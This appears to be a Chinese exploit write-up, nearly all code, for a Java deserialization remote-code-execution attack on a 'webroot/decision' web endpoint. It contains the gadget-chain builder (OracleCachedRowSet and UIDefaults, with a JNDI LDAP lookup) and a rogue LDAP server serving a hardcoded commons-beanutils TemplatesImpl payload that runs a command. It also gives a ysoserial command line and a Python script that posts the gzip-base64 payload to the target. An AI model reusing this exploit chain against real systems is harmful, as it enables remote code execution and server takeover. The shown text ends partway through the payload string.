OracleCachedRowSet oracleCachedRowSet_1 = new OracleCachedRowSet();
Field dataSourceName_1 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_1.setAccessible(true);
dataSourceName_1.set(oracleCachedRowSet_1, "ldap://127.0.0.1:4444/dc=example,dc=com");

OracleCachedRowSet oracleCachedRowSet_2 = new OracleCachedRowSet();
Field dataSourceName_2 = OracleCachedRowSet.class.getSuperclass().getDeclaredField("dataSourceName");
dataSourceName_2.setAccessible(true);
dataSourceName_2.set(oracleCachedRowSet_2, "ldap://127.0.0.1:4444/dc=example,dc=com");



JsonStringArrayList jsonStringArrayList_1= new JsonStringArrayList(2);
jsonStringArrayList_1.add(oracleCachedRowSet_1);

JsonStringArrayList jsonStringArrayList_2= new JsonStringArrayList(2);
jsonStringArrayList_2.add(oracleCachedRowSet_2);

UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor<?> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonStringArrayList_2, jsonStringArrayList_2);

Vector v_1 = new Vector();
v_1.add(0, "111");
v_1.add(1, "111");

Vector v_2 = new Vector();
v_2.add(0, "222");
v_2.add(1, "222");

String[] strings = new String[1];
strings[0] = "111";
Field metaData = OracleCachedRowSet.class.getDeclaredField("metaData");
metaData.setAccessible(true);
metaData.set(oracleCachedRowSet_1, strings);
metaData.set(oracleCachedRowSet_2, strings);

Field matchColumnNames = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnNames");
matchColumnNames.setAccessible(true);
matchColumnNames.set(oracleCachedRowSet_1, v_1);
matchColumnNames.set(oracleCachedRowSet_2, v_1);

Field matchColumnIndexes = OracleCachedRowSet.class.getSuperclass().getDeclaredField("matchColumnIndexes");
matchColumnIndexes.setAccessible(true);
matchColumnIndexes.set(oracleCachedRowSet_1, v_2);
matchColumnIndexes.set(oracleCachedRowSet_2, v_2);


Field monitorLock = OracleCachedRowSet.class.getSuperclass().getDeclaredField("monitorLock");
monitorLock.setAccessible(true);
monitorLock.set(oracleCachedRowSet_1, null);
monitorLock.set(oracleCachedRowSet_2, null);

Hashtable<Object,Object> hashtable = new Hashtable<>();
hashtable.put(textAndMnemonicHashMap_1,1);
hashtable.put(textAndMnemonicHashMap_2,1);

putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, jsonStringArrayList_1);

//putmethod.invoke(textAndMnemonicHashMap_1, jsonStringArrayList_1, jsonStringArrayList_1);


//List<String> list_3 = new ArrayList<>(Arrays.asList("aaa"));
//Field list = JSONArray.class.getDeclaredField("list");
//list.setAccessible(true);
//list.set(jsonArray_1, list_3);

//List<String> list_3 = new ArrayList<>(Arrays.asList("uuuuuu"));
//jsonArray_2.remove(list_1);
//jsonArray_2.add(list_3);
//list_1.add("uuuu");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(byteArrayOutputStream);
oos.writeObject(hashtable);

byte[] bytes = byteArrayOutputStream.toByteArray();



// 构造一个GZIP格式的字节数组,将恶意字节数组存储在GZIP数据块中
ByteArrayOutputStream baos = new ByteArrayOutputStream();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(baos);
gzipOutputStream.write(bytes);
gzipOutputStream.finish();

// 将输出流转化成字节数组,然后base64加密,通过python解密传入,触发反序列化,
byte[] gzipBytes = baos.toByteArray();
Base64.Encoder encoder = Base64.getEncoder();
String base64 = encoder.encodeToString(gzipBytes);
System.out.println(base64);

// 将GZIP格式的字节数组封装成一个输入流对象,并作为var0参数传入Env函数中
InputStream var0 = new ByteArrayInputStream(gzipBytes);

GZIPInputStream var2 = new GZIPInputStream(var0);
JDKSerializer.CustomObjectInputStream var3 = new JDKSerializer.CustomObjectInputStream(var2);
//Map map = (Map) var3.readObject();
}
}

//H4sIAAAAAAAAAM1Ye2wcRxkf3/l5dhLn4ZC0dV44SRucu9gkoalDSnK22wvnR31OArZSMt4d25vs7W5mdn3nhqJGSloQaoVEEYIK8ZZKldAgVCkRRQjKo2qlCgKRKKECNYWqgVCQkApqK/i+mX2d7aTX8g8XeXIz8833ffM9f3NnrpE6wcnyo3SGpj3XMNN3UzHt0gmTLf/Bko3r979yPkkS/SRl2lTvp5pr8xxpcqc5E9O2qZedOz9C8NNYaoSxGf4SwG4rsiunRcmwptIHcr1sknqmKzpGWdnda+kDFivalqGhqAHq/PAf10bOvvncigQhZU6WVqoC+3UNv/vxMyuP/KoqRVqkIq3wVwOKbLP5VJo6VJtmacq5XUrPMDyq+O8XtlVwOSi5l3M6mzeE++bdZ/sfW9F+WekSM0tIUT55sf1Lv6BfSZKaHKkVxn2s7KC0Uq0vc6PNqWay9FF9QkuDSMHc9JBcyqIe+ohdKjD3yvC505lzFxMJsjpHGjXbzNqe5eZIs+Zxzix3mE6xMbJK58YM4wPUginPWYZrUBNE6mNkESszzXOBqWnKuWEJxl3g3m/SqRxZGs6HbQHnbGuMLDbEsO14JnVZr20xEOwA3wIwzJGUA6YEwXBgjLTBZMawPZG1Ta9oHaJi0DNNoIf7SEVBnufowCeSF84DeXnSFOrgkjV5ZZcM2iWj7JJRdoH9nnGSOsZmlTjhksR4bpw0FplLe6lLXbJ8PI++yJjUmsoon/XkSZ1DOS26ZJnaREdlDkoHw2Y9Z1QH6WSV3C1nxHEzo4w/IneAphb1OE4+RVryZLHSaSCUeYviKo8xAQFciHbh7CJFf4hyC7RxybqYGP96SppPAUdSsBfSt0XsC/fkI6IWMWtpw9yeMaT275/PVjhGphAjgkNNMmUHKVgssEalqepL3HAXtsYhudMD8b72uqGrKD//xKXyd7+/jyXIKoxU21LBqs2OkVYmNOowUEljQoDMHFk8yVxtutfg4BEIB0hXuYDhNkYaDZE1bcH0HGkp0nK/wUxdBWIDTEGcgI3jHuOzo0aR2R5EXCM6dMgyZyFYlXKjsw6waoYKUOplJnOR2wqXU0tQJVLYEOsyFBs0u1iklo7OXgaegFilBdvjGvNXFkcraEZ/tdGElGcW436QLCtSuIIK05ylQw4G4dMa20EGwXozljqIyLytHXNJZ0UWGBYY3qJmZkDRdEiToCeRGrwG+SlEyeaB2s3q3n0zkKgued88V8oNONfggmWgdLpkSSw1YAH2kh43g9t5AuX7t8U6lny9BoarZIFP8hqOCQeYbjZ16tyRyXR1fyi9Df513bEdPhld+zAr06Jjsk74CgaHatgalVCVmS9+8f7xB3qerEmSJBQNDYuz4c7mLI2zIsMK2AKexG+yzoyTZn+6QB0YmjgKLHtk/ZUfjwcEaSRI+wSfe+FjX20Vt5lY1JE25YSfsnTTTf75hIezdiRxSbK7uxun66uh7erqwmlHSOs4cPk2vw8eN9Mx//zp30sO9/3kucdUj2mLDCR3lc75h5sGVxXvf1yqLOUm/QZHwgYHO+HNr/9xnLlW8WvC2YsHX32t/cRdgVVq5AUq7kiiO8ZNxskHqupxqsy+cHrDFW9X/+0JUlOZDci7rYx22hJnFyRFesGkeCv17adf2tnyjORWa8qkWh+L8bAouRncFBmZSVLKrZGlI6q0pEqPMPgOhcNF8skDj3d2Pnv0L0oGlmOXZG4ko+J0B5ZmJXF7tRI7Bm1rkhocj7JPd79aOPGjZhUeW6tmgWfPr/nGo0/0jn1Snd1xg7N7JwQc1dx7POYxHc9Oc7D3fYzD7bPenSNXEghw6gRkHQNeO6vgNVSy0E1xZh/8w5MXzhbt7wRBRqqIL5k6Cnph5kTNcefhralvvnLqt/HE8Sn6yhpzsNK3f/21bZf3eL9PYHlJQULpNs/aOoNiB2QFvI1f/GotQKNBEQ3acMinJ4R/MmfC9V++vXbPTT23/DQOECXFKFy5hNe/9PMdm3eVzj+fJLWAUDQKNTZs9rJshZQIInQAFIY5AD0TkJjUDJAQGF07NgomhZNrKpFPsNGnqiKwWCE8B7Eb9NJQS0BQrbGARdwKEYnse7EcrKksB3N5Jvq37N799oZdgdMQ0t98gwO06Wdf3rTzpdMJUgs2Nw2LDXrFCcaxqTLNpFhusiZ0sqDtTBpmvMmmALVM2/pgvBHVXHCrRNLgwvmLaVTXJfW7Daghe6Tgu+AmnWAXfBL4bSo9QKHakCb8zz9RW4TvcN9NUbxDTzcVhBEdB6yirRuThixHYNW3lmzseuqvj7T65QhWUFQWQqPznRlE66v3kQeev/eNNZJNDZSblTHvRWQ9fi+ol32gVvYAnI+WVaXHpxe03bTwrMBejo8RoVrkhiA2iqCiESLH3xw5tf0/K5/6e4LU5/EFoFZzvb5jQgjdmQe2GWAbQNAQucyv94hGIRz3eZYOkIzcNvfofvBmQC8k3lKkiI9VvsZCYxG8fgTcXAVUoFaAZatTK8C3AFzenXWwM805EDan+ffuX9G/ru3o8Y/LLFgEKczd6OXVgEgriyC4WSmPzzYRtxTe7VAEZQgI3zxH+PUsV7/oew2Xtz89IvMV+dwLjwCVE+uyNncgjVALhCnpbdVeSlntM/88+ec9l1K3JkirRGsQiVxhXP+9utLITkNRYPpBaoqc1TsB7/vsSAFweHzDgA1E7pD7iseARLSLweUaF3gbc4ZhI5/jz7hCOchYjC1dIv1sMcTEauHQNONB1PjvzoBmnDSot6VMntQ4qZfvRjm7OYxynB2c5xFYEAzTLxJYjz3RE2FRl0ka/j6AKqqncExFtRCpWK4AbkHnk66T36qGWMpLJ/6VfP1vo83rE6RJvstC/8Br0jeXqfrQqnlvw33e5KRM2pSiLLhFt+LtO8wZmAswAvZOv+e0+AaWXFHtSTiv1vA8rkwtAPbwwS2KgetbfDNVMFFrIRMfNHCyci5+VXpnGhpevPrs1V/L10Sdpn6aqBfTqPA4qZuhpsfw14Ssb3FofjA5t2ny3MuHT50JGlzrO4Fov+4aEWgx38WxjBy75bhDOvw9cpPFvgEB+NLIHDnI3inGl738tW+9cfKh2xVskxcvB88vSadK6INnvtDe/OgfPxuifqlKYoFfz3C9jkS/bOG8sboXIpKurgLp4dpaHDY4yiQb/8enDp7eUs0TBhe3Luyc6hAqLu/G4SFHkvThzQOcUXMBv+Rw2I/DR0MAIl+JAzgM4jCEQyHo3jg5gMOY/DoeXkwWhnD4BA5HJAmtvP68MoJfWXip9xi+/xdRPyvHUvm/IG6jkrEWAAA=

jndi服务端
bytes为cb链的字节数组,

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>org.example</groupId>
<artifactId>jndi</artifactId>
<version>1.0-SNAPSHOT</version>

<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>
<dependencies>
<dependency>
<groupId>com.unboundid</groupId>
<artifactId>unboundid-ldapsdk</artifactId>
<version>6.0.5</version> <!-- 请使用最新的稳定版本 -->
</dependency>

</dependencies>

</project>




package org.example;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


import javax.management.BadAttributeValueExpException;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URL;
import java.util.HashMap;
import java.util.Map;

public class Main {
private static final String LDAP_BASE = "dc=example,dc=com";

public static void main ( String[] tmp_args ) throws Exception{
String[] args=new String[]{"http://127.0.0.1:8081/#test"};
int port = 4444;

InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
config.setListenerConfigs(new InMemoryListenerConfig(
"listen", //$NON-NLS-1$
InetAddress.getByName("0.0.0.0"), //$NON-NLS-1$
port,
ServerSocketFactory.getDefault(),
SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));

config.addInMemoryOperationInterceptor(new OperationInterceptor(new URL(args[ 0 ])));
InMemoryDirectoryServer ds = new InMemoryDirectoryServer(config);
System.out.println("Listening on 0.0.0.0:" + port); //$NON-NLS-1$
ds.startListening();
}

private static class OperationInterceptor extends InMemoryOperationInterceptor {

private URL codebase;

public OperationInterceptor ( URL cb ) {
this.codebase = cb;
}

@Override
public void processSearchResult ( InMemoryInterceptedSearchResult result ) {
String base = result.getRequest().getBaseDN();
Entry e = new Entry(base);
try {
sendResult(result, base, e);
}
catch ( Exception e1 ) {
e1.printStackTrace();
}
}

protected void sendResult ( InMemoryInterceptedSearchResult result, String base, Entry e ) throws Exception {
URL turl = new URL(this.codebase, this.codebase.getRef().replace('.', '/').concat(".class"));
System.out.println("Send LDAP reference result for " + base + " redirecting to " + turl);
e.addAttribute("javaClassName", "foo");
String cbstring = this.codebase.toString();
int refPos = cbstring.indexOf('#');
if ( refPos > 0 ) {
cbstring = cbstring.substring(0, refPos);
}
byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
//CommonsCollections5()可以换成 Base64.decode("cc5链条序列化加base64的内容")java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 'calc'|base64
e.addAttribute("javaSerializedData",bytes);

result.sendSearchEntry(e);
result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
}
}


}

发包触发反序列化

# -*-coding:UTF-8 -*-
import base64

import requests

burp0_url = "http://127.0.0.1:37799/webroot/decision/remote/design/channel"

burp0_headers = {
'Host':'127.0.0.1:37799',
'User-Agent':'Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:120.0)Gecko/20100101Firefox/120.0',
'Accept':'application/json,text/javascript,*/*;q=0.01',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip,deflate',
'content-type':'application/json',
'x-requested-with':'XMLHttpRequest',
'Connection':'close',
'X-For-Forwarded': '127.0.0.1',
'Referer':'http://127.0.0.1:37799/webroot/decision',
}

b = b"H4sIAAAAAAAAAM1Ye2wcRxkf3/l5dhLn4ZC0dV44SRucu9gkoalDSnK22wvnR31OArZSMt4d25vs7W5mdn3nhqJGSloQaoVEEYIK8ZZKldAgVCkRRQjKo2qlCgKRKKECNYWqgVCQkApqK/i+mX2d7aTX8g8XeXIz8833ffM9f3NnrpE6wcnyo3SGpj3XMNN3UzHt0gmTLf/Bko3r979yPkkS/SRl2lTvp5pr8xxpcqc5E9O2qZedOz9C8NNYaoSxGf4SwG4rsiunRcmwptIHcr1sknqmKzpGWdnda+kDFivalqGhqAHq/PAf10bOvvncigQhZU6WVqoC+3UNv/vxMyuP/KoqRVqkIq3wVwOKbLP5VJo6VJtmacq5XUrPMDyq+O8XtlVwOSi5l3M6mzeE++bdZ/sfW9F+WekSM0tIUT55sf1Lv6BfSZKaHKkVxn2s7KC0Uq0vc6PNqWay9FF9QkuDSMHc9JBcyqIe+ohdKjD3yvC505lzFxMJsjpHGjXbzNqe5eZIs+Zxzix3mE6xMbJK58YM4wPUginPWYZrUBNE6mNkESszzXOBqWnKuWEJxl3g3m/SqRxZGs6HbQHnbGuMLDbEsO14JnVZr20xEOwA3wIwzJGUA6YEwXBgjLTBZMawPZG1Ta9oHaJi0DNNoIf7SEVBnufowCeSF84DeXnSFOrgkjV5ZZcM2iWj7JJRdoH9nnGSOsZmlTjhksR4bpw0FplLe6lLXbJ8PI++yJjUmsoon/XkSZ1DOS26ZJnaREdlDkoHw2Y9Z1QH6WSV3C1nxHEzo4w/IneAphb1OE4+RVryZLHSaSCUeYviKo8xAQFciHbh7CJFf4hyC7RxybqYGP96SppPAUdSsBfSt0XsC/fkI6IWMWtpw9yeMaT275/PVjhGphAjgkNNMmUHKVgssEalqepL3HAXtsYhudMD8b72uqGrKD//xKXyd7+/jyXIKoxU21LBqs2OkVYmNOowUEljQoDMHFk8yVxtutfg4BEIB0hXuYDhNkYaDZE1bcH0HGkp0nK/wUxdBWIDTEGcgI3jHuOzo0aR2R5EXCM6dMgyZyFYlXKjsw6waoYKUOplJnOR2wqXU0tQJVLYEOsyFBs0u1iklo7OXgaegFilBdvjGvNXFkcraEZ/tdGElGcW436QLCtSuIIK05ylQw4G4dMa20EGwXozljqIyLytHXNJZ0UWGBYY3qJmZkDRdEiToCeRGrwG+SlEyeaB2s3q3n0zkKgued88V8oNONfggmWgdLpkSSw1YAH2kh43g9t5AuX7t8U6lny9BoarZIFP8hqOCQeYbjZ16tyRyXR1fyi9Df513bEdPhld+zAr06Jjsk74C